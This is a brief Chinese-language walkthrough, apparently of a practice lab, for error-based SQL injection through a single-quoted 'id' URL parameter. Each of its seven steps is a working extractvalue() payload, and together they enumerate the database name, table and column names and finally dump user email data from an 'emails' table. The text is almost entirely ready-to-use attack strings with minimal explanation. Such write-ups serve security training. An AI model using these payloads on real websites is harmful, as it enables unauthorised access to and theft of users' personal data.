1、判断注入类型
?id=1(没有正常显示)提示了一串字符
?id=1'(出现了错误提示)
根据页面的提示可以知道这是单引号'的闭合方式,并且是报错注入
2、查询数据库名
?id=1' and (extractvalue(1,concat(0x7e,(select database()),0x7e)))--+
3、查询表名(看到敏感表users)
?id=1' and (extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e))) --+
4、查询users表中字段的信息
?id=1' and (extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e))) --+
5、查字段USER中的信息,这里查不出来,那就换一张表
?id=1' and (extractvalue(1,concat(0x7e,(select group_concat(USER) from security.users),0x7e))) --+
6、查询emails 这张表中的字段信息
?id=1' and (extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='emails'),0x7e))) --+
7、查询email_id中的值(这里就拿到了用户email信息)
?id=1' and (extractvalue(1,concat(0x7e,(select group_concat(id,email_id) from security.emails),0x7e))) --+
